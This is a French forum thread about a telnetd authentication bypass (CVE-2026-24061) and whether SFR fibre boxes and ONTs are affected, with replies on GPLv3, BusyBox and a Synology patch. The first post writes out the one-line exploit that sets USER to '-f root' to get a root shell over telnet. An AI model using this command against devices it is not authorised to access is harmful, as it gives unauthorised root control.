La Fibre
Datacenter et équipements réseaux => Routeurs => 
Remplacer la box SFR par un routeur => Discussion démarrée par: rooot le 27 janvier 2026 à 08:27:19
-
Salut a tous,
suite a la lecture de cette news : https://korben.info/telnetd-faille-root-exploit.html
certains d'entre vous ont ils testé sur leur ONT externe SFR ? ou leur ONT SFP car il me semble que telnet est actif sur certains firmware. Je ne sais plus si la box NB6VAC n'a pas son telnet activé aussi ?!
En gros, le serveur telnetd passe la variable d'environnement USER directement à la commande login sans la nettoyer. Du coup, un attaquant n'a qu'à définir USER sur -f root
et utiliser telnet -a pour se retrouver connecté en root.
Donc si je comprends bien :
USER='-f root'
telnet -a 192.168.x.x
ici je vois qu'ils mettent tout sur la meme ligne : https://medium.com/@shivam_bathla/telnetd-auth-bypass-to-root-f6e239d692b5
USER="-f root" telnet -a IP_ADDRESS [PORT]
Cette astuce va etre utile pour rooter certains routeurs et faciliter leur passage sous openwrt ;D
-
GNU Inetutils est GPLv3, donc normalement on ne devrait pas le trouver sur des routeurs fermés, puisque la licence est censée garantir la possibilité pour l'utilisateur de remplacer le programme (clause anti Tivoïsation).
Les routeurs utilisent probablement le telnetd de BusyBox, qui n'est à priori pas affecté.
-
j'ai reçu une maj pour mes nas synology :
https://www.synology.com/fr-fr/releaseNote/DSM?model=DS1522%2B
Fixed Issues
Fixed a security vulnerability regarding telnetd (CVE-2026-24061).
le DSM est pourtant fermé meme s'ils s'appuient sur beaucoup d'open source.
-
Le DSM est pourtant fermé meme s'ils s'appuient sur beaucoup d'open source.
Mais on a un accès root à DSM, donc il est modifiable par l'utilisateur.
Ce n'est pas la même chose qu'un appareil verrouillé comme beaucoup de routeurs (où on peut uniquement flasher une image officielle complète) ou les box opérateur (où la plupart du temps on ne contrôle même pas les mises à jour).